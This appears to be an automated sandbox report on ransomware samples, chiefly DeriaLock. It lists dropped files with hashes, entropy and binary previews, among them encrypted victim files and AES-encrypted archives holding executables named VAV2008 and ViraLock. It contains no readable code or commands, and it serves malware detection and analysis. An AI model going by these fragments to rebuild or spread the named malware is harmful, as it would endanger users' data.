                                                                                                                                                            SHA-512:9D3F5FD405BE3A76B9D0150E58A2AF24CD609A1B7B63BAC9E68350A0B153A42BF4941C5D2D8D752EE5D9D6DCC690250811A9C688E2EFCC458ABEF71580ADD73B
                                                                                                                                                            Malicious:true
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:PK..3...c.).#M....!....... ...Endermanch@SmartDefragmenter.exe......AE.....@.97@..g\7.B..y.u^RG)...\M..x^VB...l`..h...W.P8.B.:..(O....V.)6.%...:..X.,...'<.....rB.....GQ%.p|.p"K..h.x..t..Q...".n...U...S.t...?.6......]Z..z....#a.(.v]A._R./...kJW....i.:.q_H.s{S..LA.X.O...~...C.."..r.o..B.4........k.X........B.j.....J.Da...."..,6.....g_../%F.N$Wj...U...J.nRr......].....EN...V@{(......C.p.Z.|N(J)T..\.......fv.6.F~.b.........)........@[..0.F.f...G5..3L1......:..u.G..AjF...8.er..jX+J.i......'hA..>#^..*6...-/.XG...\.rs.5....FO..P....<.ePA..&...T%....S..l.wT6.....s.]K2pKnr.~+.....Lc.....>.d7R...#.. .Oz....9....).2k-.R`...^...|.....|dXS....rd..N].m8..#..|..y+...?...E... .......f...RG..F/F.K4....J.a.#2.Pc..S..d..?......Q...0..#.h...R.N...AJo._9.r.~....r.V...5..Fx.....A..y.R..m. .D.^..Q...-...L....v...%.E.....9.r,.:.C..l.9..LF.....;....*i.a..o...*...v.._......r.=z......={h.*Y.8..i.....;bK2....ORr.p........n.....]b.C`....".&..qD.y..t.5....}.kG...;....u=.
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.8088036684364965
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:NniICUe/YVXPPoC9sIc53PTozzjtXLDW5FyJrY/Fh8LuX9icOY:Nnib3WFsIc1ozz9OFWmFh4u9iNY
                                                                                                                                                            MD5:CF05C7967DE72AAE942F11D017FFBAED
                                                                                                                                                            SHA1:D2158EA9F1AC222AB44769C263470B287C4BC48C
                                                                                                                                                            SHA-256:0962EC368649793588050387AB57D7A9CFB206A5A26CC84E4A543F66A71D2A3E
                                                                                                                                                            SHA-512:DB4E483FFAD113BFE20DB54FF3836DAEAFF7F1B6977F716A7A9C29A0724F06A587D20BF1CF1BF9E434BADF98B4E6B7BE282EB993D90DC6485E5C489320AD128A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:.&'^...!Z.=.p...QB,/b\7M.M.}<......*....w..-.c....n..[....m.Me.JDE.n..}.x6..0..i..dL...%.........:...,.x.....s.'\.........|P.2.}........u..e<..q_...GV.m...`..n%eh.WU.....qwK...A.Sm.K...c...!i./.j..D..2..{.Ei..Z..H.M.S..E..F..SC....%:......t.1.....6&..P............'...F.t..4.... '.)..GS..n.o.@.......nJ....&1Ej.b.....3f....s..7k{....pZ=.#.wU.Za..Q.M..V.......s.q7..+.*H.u..wO.8..u...^..py.}.j.CwG..V.[r.j....3b.....]{...O.(.n..u...4...\...-.7#.......... m..u..1....t..-....CD.=zS.V...=...|j..@.......S.eO/..L.....g....d#!......X.{....9...;..E.6......,.=."...X.....#&La......m..h..}...oxz......[.M.....?...Z....S.+....W.{?..kW.V.5..LX..s6.Es...}..P...P<p.s...p..DL....../g1..d...XH..wA".jf.!S.tx...7.........T.2....O...8i.....|.B....cD..C.(...o..Q..?..c.w..TbG(-.\PWw).k.#...vF.9.._."'\Nk....0.=h..v.5f..Gu..|B..'6.5.t!....[\..y...3.vG.j.l.;.\n...w...t...F0.....9;..m....A......Z.*..Z. ..._Ih(q.^...1......t.7%+W?..)IXk@Zfy.<...w..P...7.2sC.j.0?.hqr
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.79142013577665
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:dfuzG6TU58eWLwmgw9KQGFKZ/ad2DZu5Laahd:dfuzG6TUPpXAwi/W2NuJrX
                                                                                                                                                            MD5:F9703D4CC81C98A99FDAE2DE3734655F
                                                                                                                                                            SHA1:70E268B34D52B89531D8F31C62B004835EFD4A5D
                                                                                                                                                            SHA-256:C87B5126337D1C8912EB3B839781BA49521DC35D7E216B47290211781F8A049F
                                                                                                                                                            SHA-512:9246A0E2DEF72080FA02C76C7FCE684C2CA5754E1AA8636107BF6F9A44E94C16C5CA53437DBE7165FEBB11985709C88A67C6F2FF533DCDF47977F8A5F2D0ECB9
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:...$..:7.rZ....L.M.>?r..\.#...P%b.-...........Q._`"...dP..^B.....xX.........|PYV~..z...n/t.2:b.15.T7M..+..z....a..R.a.Ky.....Ho.0.h"..j...B..m.~.\.........xP......O..`......M......8s....k0...........VXMC*......Vu...s..h2.L.eo.!.{.'.Ff.....\0...OB............^?.f.......!..=&_.......U..q.q....sC^..T.......:...).."..........5f..P......E..wyO.....x.m<y'.....>.....#g.-.._./.Z..y.#...[.....k.K.h..3Q...n..{.......,...L.v.`./g..q.j..`...:...J7..J!......Q`%."..4'+.....F.qQ.3.$?..%P.......&s1L...G..>..V..].$X..(53..%.v.0.s&n....c..N.q.M.J....d.[5=..A....R,%N..zf...*.....A|'Sc..uo.E......\.B...k....b.=...gN.]].@J'.....>.D.}..j...r........NN.s.....djm.~xD.........7...\m.;.>../.=..3.....%...+C.+K........D.N..........a...T:.x8.U...q....iGk<...a..1...>...H,....8..s.9..k......wg8....j_i*.29.....PA.ga..cw'z...{&So...z*...F(..n.ZW..}..(.O....^OM..R..W&...v.}.W.T......}/7jc_.e8..5.,n.`.nAG5...v3Yl..h..p;/IF...3...V....4{...hJ2?I{?.v..rS.YN.`.1.l.3a........>
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.814895241226781
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:MOcBIs5kgO0dOypcS0/yXtVFQpMkq69OF7ExjHWGGo33RY5:MNIs2DOdi87uWfIYS2GF3C5
                                                                                                                                                            MD5:46B5ECC888EB079FBD161F72DAB361CD
                                                                                                                                                            SHA1:55CBA7032ECA9A6BDD90B94C5EF75974330A6E4D
                                                                                                                                                            SHA-256:35D0769D88A4D4452C19F28822E1144E4D7572EA0E5095F9880C90F11D24669A
                                                                                                                                                            SHA-512:EEE0F71DB590AF35A5AC7922A67E5D2C0DC5192B15BF0B80A934EC41C822F7A4DF1D7EE8AD4DFE100D3BA8EEC1082461C56D9F20A8E54255A3C6FD3C9DC86E94
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:n.A..(.......D}dIG%.x}.$..-.N.Z4.k......n....tc....b."q../.5.7;.f6....../.|HO._6...[..'........P.K.S8.Z...*.'Jo....1.....dK.1Y)|...Q....w...I.'........f...zPY...|....,..O.J.UJ.S..@..{.ad5.|%m-C`.....z|3..F^.WN..9LUc.=.O.cC..u.....|......r..*..q[.LE...m.'.p..M.1:...y.}\.S.....{......|]...6.u.4..j5/;.Qw...L..S......E...Y..W..l..+y.{..mA.Ts.].-.tuV...5.(E.i.'.z...\..0..#.9(U. ~.o...;...e7.Eg2.....I..n|i.....C.7.Jb..NU@9..._..^*.<.....yU0......,`.5.0...U+GEN...S..:..{...I......z.|....wFS5..z..6....E..9<.52..^..*B.F.L..!|.._.^..2.Z..K....S..F.[.p..$..~).a`.| ...7mbR.@f....q....V..~`.~|..Sa/.X...n.1...`..[.6.......9.x..C.p..d.I.zY5O.{...../...'_+.....E>6...)....Q......../.A.Z.2.......V..%B.C8V#=.....#.Pm.....!,S.qt...>x;....yAu..fW..N&.....C]3.i...N.../..Z..6..d.....Kr.+.J{I........q..o.$.4..d..g*....B.....2..q7@\.!......ke7...U...._.x.L.FC..E~.....J..r..*..Cx...a....N.n>+.W)c..EF_...&Y+.B.'n .hV."N.`q...z@.0..\O.T=.p...;..I.+].m...6....(H..2.....B...;.
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.804437835799195
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:Ibq5JJz1fIISZQdpbu+dVu4OREqCeucJxslyKCm0c4OrGxLlSwK0g:Ibq5bhIISZmuyVrNQuEKl0m14OrGxLc/
                                                                                                                                                            MD5:751EB1D36FABDC173B9622024A184E93
                                                                                                                                                            SHA1:CCBA7033ADD3DC8BC7B5B7623382AA0FC71D1E73
                                                                                                                                                            SHA-256:ABA3474193D5184E397F7C450094089ED352D7DB8567AB56E3F39FC1C9F4B97F
                                                                                                                                                            SHA-512:23B755495F2F5BF240F15ECFC62CB232F52D9F5E8E9DB67FB8B63B5B6E4531B97AE83C6C86A78CBE3A3CC156075D571967F471953DFB122A26C0722C79D748CD
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:'7.g.a.R3.......l..R..1D0..iJ...8.{..]...%...S..C'.#...Hw.(...2....LPoT.....~.s.c3.C.`&B..a..../Tc..(..9.....~.....7K#....;...=.+y..2fs..i..8.a...er......./...d.)..Db..b.s\$.sLC...E]-ZVeL..a.G.."{....Ag....X1+)P%.-....q....+N.....r;..~?......j..D...kj.f.!YX.}.<....!......{.uV....#...".5V^!.A.O.J.XU.Y...0D..:8`..........j..."N..[....#..............t.d....;........../..PPq...[.|'....2.Yu#.=...%......+1fv..-..'.L.)....w.....d..di...!...8...dM..g/6..).(5..mb..*Q.l9.G.~<.L..{. ..v.hU........3w........f.<(!....T:5%..[.2........N.{..{[F.CbM......8)j.:$.2._.7.@...9.0oS.}.V"....Q..8S#8..zm.]...D..(........0.5.......s.P..t.3.....$....=....UU.....Ya.Q.%.....z..p...^b.)U.........E.......@....5..B!|..f.@.....49^.O.{<!..-X.Qe.....7[=..Z.X..c....D{.....T4..n...Y...\...fyw..D......(...l)..yhU......;.UP.4.. ...q{.....P.G..`$.|.].d3.q.Y&..V${.RV`...~..gke....z...+...*..S|7..g.;...L.....|$.|p..ssVC..U:..K....2b..~.".`...1.......D G.'."i..Q....pnF
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.848010982239563
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:IWqLEyMdwqAXGIh4N1iCZZDkPbcvsR66oNlEv2suUC4FjDWO6r:IWqLELuDGIfwoPbc0Tulc2suUC+DSr
                                                                                                                                                            MD5:1C62A0D6CE4821C679D2D8E5DF63B2E7
                                                                                                                                                            SHA1:4946509589A384085C9AA99D65C89A04D5500C49
                                                                                                                                                            SHA-256:38BFD6AEBA64599DD6DFC910C87E648CF17152439E7BA854E03B949B171536CD
                                                                                                                                                            SHA-512:4E787BFA6FB1123279D092724968B8AE6ECF8AB9977A97D0386D07F84665D70A2107828A5CBEF48E11B6533EA82E80A7C4F7784B12576AE74B8FBC7E71D2478A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:..E.C.(......9.......P.zv...;. ..!qw82...$......|.....C.....WjZ...xp.x:.t.?.Q0..6Qt..........j{.....?.>...i.....O.h..f@<....X}....OD....{....8R....'].AoM.S.Sr.i....b.mL...ST.d...A..y$J&g.dH....u.Q...{IK.@....6..J.M.,yx^M..).~$.x..8...%jo.U..9#...e..~ij.m.r.6.p.....IG.$. V.n.eH......H..%...K.1/..."...J....._k.Y.k.@..oOmDH[]'e.G....J.E../.\... .....e...o,.(J.Ab../..Gj..{...zRu .F.t........]n.;=...,..4.B..N..(Y....20......^.jD!........jx..tr.T..d} 2....:.!].`.i..J..5cP.z....4..u...|F.g...~Z..$.n.a<._..!..j..].#.gK.2.bF..."\..a1.E;....O3.;.Uc...T.(1V....D...q3_.S...C..\n..~.!n>.......x<.9ak..Il..Q.Td T..L}....Z"...t..........Xo.\.u.2..fs...-..\.....'S..a......\..Xh.r..|T.+......6.O.ur..:..R-o.....x..V...........F.l.\..........&.[..*k...5..(.~...e.cf..k..f.Y......>w..$.N..2y........J.{.5....7%N=..,..R..z..K.-.c..\.J....3q...XF=y-q`..........lf.9...e.ZE.P....O.~...)..kV.....D.......K.....R....A.......V...!.?....{..[JN..m.# ..>.JbhN5w.......
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.815926113570829
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:lkbn2xQpra2cHJo7ofzUMfgFXO04/kpJ8GKnrLQ6etas2fpXnhPiO6Lm+ruA31Yk:Ok8AprfzUsgxhArLQ1ExfpXZ0zqO0LS
                                                                                                                                                            MD5:341B5F7F47BFA5C4AA0338D9703CB11F
                                                                                                                                                            SHA1:AA2C986AADE05A550CA3349A5D94ECC41C173836
                                                                                                                                                            SHA-256:134F023C6E4FDCAC59602F35241A8D1F96CC7B87F748115C3DC0CA21BE99B9C4
                                                                                                                                                            SHA-512:61A254B5A81C30C164D7B68762C423BDA6FC16263DA158A7B6451574A173B69BFD43D78EBBF02CA3C1B505260E5F50A6418A1E0B055F0E9A744CFAE161038E57
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:.(.....|PH...a.R....XLP.....s.!..&..Q..A...ib........!#.\X.i...._....H..5.......CN.5.......${k...@..H.vU......1.)...?.y..D.qy?4A....j..Z.j.m........I.]WHX.............~./...T.F..W.....o.A....Dq..A....s.U.3..x/2H.=.8........!.s.g$2..)..o52...........V..+#.j-@}}..xx6..c..1#0..b.Z.<...r.\...dL..T...........T%....Z;..}.ejQ.$...*.a8..Q.kW.k.....J.)........?....`h.!=!..(....&^......(...y%..]}...g..e..'.D.......).....y....*S......Q............X..K.A..?UrG.L..9U....R.....ds]..B...1...?...*.J..jLS.d..\.BBf..rYhb.":..^.>`..z-.....Y:..d;OmD....)...u&.f......).v5....{.t..k.....H.....T.M3..1..1n...N..P.....5oJ.......UHz&Iy'......0d....}K.Q?...$.e.....p.\5...68Z.3=._...P.L..[.cD...pj.'y..Oi.._..K..../p.v.r....a....."...X.T....[...S9`.Os.....h....c'E,.8.....n.f[..@b...J...M.?]..N8M........O...XM?g.w..{.._....V.A./.........e..9_.=-.ww.%?.F....+.}"M$.0...P4...r1.3x<.^.(.}.Yu!.....,B."..UZu.,.............1".;....6..<*..Q.a4.6....P..[....j.....v....j .s..<{.
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):784070
                                                                                                                                                            Entropy (8bit):7.999747224972193
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:12288:qfdxMBL8UIO+V+uEVAr7O79u5WjsPtBaZf/SzSVbYnOv/tnNriQ7QkmgVYDlbg1b:qfU5IO+kWr7O7QwsVAZyz6Yn2t5JsZgD
                                                                                                                                                            MD5:B698AEFA1322550E130867CBD69CE67B
                                                                                                                                                            SHA1:74C12404ED33CFD13B58606757F9FF0E06650C41
                                                                                                                                                            SHA-256:A2247754D4305D00900DA86B8957562696F80AE025C8D8EAC27F38E4023E7F89
                                                                                                                                                            SHA-512:B1242E7CD5506955D6D999213F98F16321CB866F7FC6A14ED9D11E1A8735C9B4632E9E8CB83073797B5ACE91B963D57BBBB63EF8D3640C1048C962778834B5BB
                                                                                                                                                            Malicious:true
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:PK..3...c.s..:........s.......Endermanch@VAV2008.exe......AE...,.jM......`.n...[.7........33.Y.-....?x.so.X_.!s#7lN..*.Z..5...6I.y.vO.q>.1....>.J...g..g..[...o....br.&..#...'k.U..b..V~W.2...!..x,....!..8..5,....g.w[.).>..5..-]3+......8C........S..(gn&2......M.w@a..y0.~#.1r...li42.d.Ahoq>.OcB82<..JRN....)...X.8]..V.....8...,..<...J.}...............:..1...h^.*.nBn.f..*....zA.(...).2.K.l.Jv.%ZD....Mx7b .~....A....".....q;.]A.....X...?...7.:D.....$..........g.tw..`2.7.T...(.v.8.._^......X...m{.=.M.._6..B".....)D.H.....awI.h..o....0+..YO._.i.4...C&.....%..q,...Z.>.^_7.6tC.<.....P{.[.4...3Xo........d...Q.>,4...o....Z....,.._Jk.....Q.V.....>...D.Yb.]{h-s~<.bK.NIl.y.`.I^W.'.9.l..e...k.U(.E.D.......P..^.<Q...U.KBA....~...d..x.6b......l.g.s...A..DVQ.8.....Zi.F.#...8..*[).@....K...H0.......k..T%.`f#e.N}!{ o.0..<=4.....~9q....V.G.6...c46...L....".....).sx`..........F...6.%N.b.....)...f.\.*HY.k..[..a...J.D.-.ev....vPc)t"....b....+..Z.A_V...H..=r.v..G..|.4..p
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):135339
                                                                                                                                                            Entropy (8bit):7.998464822213335
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:3072:EVGcVUZ2RO+vvmYYN4ul1c0wTLcc0JuEzXiXoNn59cz+P+gJmq:EFVOYM4IwUc0JpzXYorWyL
                                                                                                                                                            MD5:6A47990541C573D44444F9AD5AA61774
                                                                                                                                                            SHA1:F230FFF199A57A07A972E2EE7169BC074D9E0CD5
                                                                                                                                                            SHA-256:B161C762C5894D820CC10D9027F2404A6FEC3BC9F8FD84D23FF1DAEF98493115
                                                                                                                                                            SHA-512:FE8A4FD268106817EFC0222C94CB26AD4AE0A39F99AACAA86880B8A2CAA83767FFE8A3DD5B0CDCC38B61F1B4D0196064856BD0191B9C2D7A8D8297C864A7716D
                                                                                                                                                            Malicious:true
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:PK..3...c..7yE................Endermanch@ViraLock.exe......AE....d...EJK.k....+.$?.X;....g.........>.jO..y.p:.d....~.......Y.y.....Q.....iy...\...}.....V.sL..@t...<....au.l=i.q..w..*..`..h.a.........3\.0.ox.i...C..f.=.E.....>..A....2.X.#.qml>...5.YLj]!Id.#...A .1n{8.D?.P5..<.G[.R...P.j..m<$...O.\v...%...R..s.M......:.;......*....!:.:-.5.p.....d%..C....^n.....,.l.qWN..T...rW.~zlz...<H....?.....m.so.e..*.k........?..bI....c.R...j...3...g.D.O.&B.".?)Z..=.y...J.^s.Z.....f.n...J..d7..&]...&..N.}e1......2w.w.:..C9W..B.T_..%.4....y.qa...Q'ry.f...;KY;e..VN...PE|..d....T....d..{........(..r..b1.R....J^...E.H|.B.q(..`.3.....Ge.........D...........R...>....?.#..B..s...Z=..y.E.Ux.m."p.i...p....Y...2..C..3].q.7...i7.C.Y.Eo...z..]... ......)H.;..D......+6.Q.d.o.d.=..e.O..[+...,..siV.1f.........[.....XTh....(.......fmf...m.......T..?....r...O..'#u.=.....Z....|d^..<....n.!.=dwos.|....e......ul.0.z....Bp..7|(~.Q...Z.>.._.V..W....t....2%.....7..+.....B....
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.819386831370089
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:Dnb91xra0uHTOsAnJQ9kaTQcbacHGTppcI0fsUAhrIguUBFteUbzRTvFVb8:DnxOJ7AqkY9GTQjEduU79b1TvFm
                                                                                                                                                            MD5:EBDA666F4460B2B27416BD5F94E379DF
                                                                                                                                                            SHA1:FE259ABA5C38890AADFFEA13056A3A05023F084A
                                                                                                                                                            SHA-256:784DAE2F0089EEB41EEC878BB3CA3E116ED90C5A1D2F8E02B27271626EAFF371
                                                                                                                                                            SHA-512:953437A87561E867FF089D29F7A683A72C405FF37520721B8802EBEE8CCD1B3E7114F90D242BEB96B60F318DD9FB43DDE1F326C778643BCE53710E64C38F5874
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:..~....7=..w.:`P..N^...c.s3........T..z}Q.].e.....TI.. T....7.9.8n..^.HH._...[M.../y...s..RF).(y.T.Bdg.z.(e.....#J...c.@....s3.d3j.n.Pe....u.2...@X.e..#1.}-.......z.g........)......R...x...%Z.....W\.\.{.+A.1.~L.J......[-lv....I;....v4M.X%..w../..tE.. ....p...NY.Ip..j....6?2.y.'.. y}...U.%.....y..........92.D.....)C.|..R..........3|...?.A.1."&.c."(#N.Q..Q..5.~.~:~....v..6......'...Cg...zjl.O..+..;i...%9.>". Ns.A2.)ML`....f.O..{.r..Z../...`..Yr..]3@...D.v.`.....b.>...@..#+K..z3g..<.UD...<.Z.DZg.....|t.........hr.r!....NZ..D^.a.lA.....S..d.6>...;k.c...3F5.FQ...).^...7x...x.G.2....i...R.g]..IK.xF..&..y..'...1.`.u.8H.u........x..;.k!Wi.[#..........f..5....H...).Y...\..."12....6..T..v...-8.,....M....].x....]..&..a#.f.T..;...~z.F.GaA.C4ky....Yu......j.v.)Is.[..<S.0.9..].2{.;.zd.`...._...d....V.r..H7...1.m.b..0=...T.'...!c.E.^............Ci;.#....?..._.s_..'....V.c.........mo..j..J.|0g.F]..7../.....n\....D.K.E......?.......Q.>...hu.
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.832302816111162
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:fea8T7vtHcEVR6GAMXE1yMQ8DF99bRQXCRVX8i5JA/H7sc8Ir:fexVHJmG11MtF95RQXGXMQve
                                                                                                                                                            MD5:6C458EBBD557F228108D7E18DB6959A2
                                                                                                                                                            SHA1:FD72EFDF16D45442EA4BCD6F492D43C25856954D
                                                                                                                                                            SHA-256:AAABDC32BCAB3657DF4B4F103A1CA9B2978E3B4B208574F203C0655A1539E443
                                                                                                                                                            SHA-512:F026AAA0CBEDD6A0B85B24FCFF08788F8E37540933D3E174CF4F1E47AF42E5D4BDCB0517343D42D563FB19DE2E02453694F19E0E584C228FB038F5DC5B835D8C
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:wUG..zd....~.....QO..iFy..y+..s/..Na..3..P..e..P.....(..;..t....qKP._.S.zd............G.#.]AZb.N.Z05..x...+.3..9....,A)..*...p.f...u+.,.Z...m..N.i.+E..Y."u.8.S"G.\..t......@..3918/G......#...u..V,@.Knw.Z...._.g..o.......v.Z..m. +..d.$r.u.vV.[..l<c..j.9DbR.+.0....m..7j4.53.NI.J.@Zw..7.......E=L.....E......$C.@.....Bup.$.RR.......k...N...........kE.v...^?,;..#..R...C.B3.....i..._..p...j6..k.0....C0.*.i.Z...(.........K.'.l..Wu=..T..U)..y...U..MN?....r.......i..o...?..P.9...e...._.U*-.0..t..... ........{.D..p.'T.H.)...s.......l...)..3.Iq.)..&.PI...c....z..<.......xG...D...8....;..+.......O..Gm..8:Ws_.oo.......+...w...f....U.C..?.1....[...aR.\.....z.....r..E...H.&.M..S0.ZASs,....>.........S....^.7V..~.%..n..J.......kh.8M.9*`..WikB...g'7.Z...C........m7.Z....[<.Y~.....h.DTr2.V.1.>......~.Q.AJ.H+..*f3....d....Wi.1f.lnw.$]. ...D].)`..L..../....6T.........5^.'(0s.,.......z.c.`.3...1..#b.....b.V ..j.5)....;.....g...e..x....?2;T...t.
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.771484717063246
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:SHP4GNLlvaSplQAtY4m6h7HdWaTtzjYOeD91ZKr6Mb:Sv4SFLDtA6WaTNjPeD91Z+l
                                                                                                                                                            MD5:2ADDE5A9BD0E406131D2FCAC77C61E24
                                                                                                                                                            SHA1:9662F9A6B6490850BA1B008689AD4CDA7C5AA96E
                                                                                                                                                            SHA-256:0C8A37A00C1036A3A46AC176CE9DE65CCE796179523F3CF17506490EF04BD324
                                                                                                                                                            SHA-512:77EAEF5AE37E82409A97CECC8E624020E2A9EA85B52989E0C54F60DBC6FA3A99963D582F928A77D7A8B289AEB905BCBF21CB6568776D53541E15D905E8A4F93A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:ht..~.=..m._.u~.l..-.r.....G.............f..e..$.Ky...3%....T.p_...>'..i|h`x...R.....$...y....;...Tc.=p.L.%@...=...O.=h.....-2.....^_...6:..*..&E.q}|8.#@...0;..W@.....#P..Xwuu.........L......5..-.}{.}"...e.l~.^.....T.....4.`..s....X..}i....[p.a...... ...|...L..Q...m...-R..].-.-dZ.|6.?1+..@.L....B..".H^..{og~4..Z{h.4J.}......K.U....R[..w....O .?....0s..dK..1XS.g ....e.~.zdL.|.*..HM;.,..@B.l.Iy~....W..q).ri.."...J...z.X..#4Utc.Xp.0..P.]X..q.......=..rF.K.....3[.l....P..?oPTQ.VSY....t......X...G_...P{.h;L.8...81=....P....5$.:F.U....2A.........:c.......l.y.pB$&>Y.p}..9......e9.4O..h(..LN...s...../i...x.e..]1.h.).\0G.....V...9..+......4....#SLE4BW3.n.A....'.......q...V...cZB./..6i.(t....HDZ|....Sp..%....o..SJ.....D..$E@n`W.......z.n.sSjF{..-z[LU....>d....r..,...}...C..Iy....H......C..BA.}. ..D.=..6..}..B.]!..Eq....W.4..lN.|.#....".]..i($.x..U....* Lx.`<.....w.d....".Xj....d`\...8......&|sP|..rj.uT.4U..6.]........tMEI..a...c.L#S`H
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.828519774720778
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:VbiGYUoUk3l1MDepq490JAmxiiJItPkinJQOM06TLyP:V5YQk3xj9gAPiJItDJMTy
                                                                                                                                                            MD5:482CF9CFA52B480A2D61294CD1A27F9F
                                                                                                                                                            SHA1:72DAE5B76CEE194E04D24621A996178DEA9C0403
                                                                                                                                                            SHA-256:E5CBD2F9F60C66C0E40804A5A757FDF3C2AAAFB5A3B0FC103CF4E763F44AC344
                                                                                                                                                            SHA-512:C524C5D33CD4A5239B600D53F57FFA00CB3E14A94B454FD7A0AAC9092FEB8BC34F956D9EEF023A5E2F059FB96DDB594FD9827410422DB3B8CAF665D8C873FFD3
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:.cac..o...ri..pB.4...l..].3.7.%{K...:.......o.x.tG.ugU.U_.>.?5......k..?..S.OM.....y....P..._.Gz.|@N.....X......$._....N])..p...H.`g..._.......=Ld...C"Q.f..H......r.:.....l..f..U."..`.......m...,..Uy.....j."....=B.8.0.5....Y`....l^k.B.w.......k.........V..d.H.E..K...L.*..U.RCJr.s..0...Ad^...3.c9',..bJ.....1.C#.6..i....r}.zt....k.@..A.u..l.{q..\.#.4..u.d.....0k..q..-g...}q... R.....T.{.hk... `.....E.....~.....v......Iur.........*..)...WN[~......1...o'.j...5jrM}.6..n...b..+U.I... ...1..d.th..-.}..f.....pg...+l...\.bc?...]..h9K..9...........7..8..-=..xg....+...k..r..}S..l...F.<."zg.c3EQ..C.@x.6..N./...+a..o........9Dt..T..Lkni.tw.l.+....p6.q.......|.6.......].>.x.p.......j..1s..L..+.....S.*.8..).:...G.n..xw@......+uL...*...Bm.D.o.~9.P.........Y.w.#..E..........$.hx....A..........lg#:../+.(P.c.F..w...>.i....tr.ja..@..h.r.D..T%....2..$..1....I.....V/W....%W.Pc...M.:..?W.o...U.w.l(..n..F`.~.co..w\.*.&.I..s..N.-.R`.UG..p.3|}r.-.C....
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.824413075168998
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:QY0UBJGQktpHikW1fIf7AiVwgXeoFzsa3TdbP:b0gJGQAgiVpXeoCaxb
                                                                                                                                                            MD5:ED759B7E045323056109AA2778E8B544
                                                                                                                                                            SHA1:9978BD167AE62C303B606A91F5F1B08844B664FC
                                                                                                                                                            SHA-256:38380F72F2B9770C11284E067617A8236979ACAEBAABC75D23792198F2156306
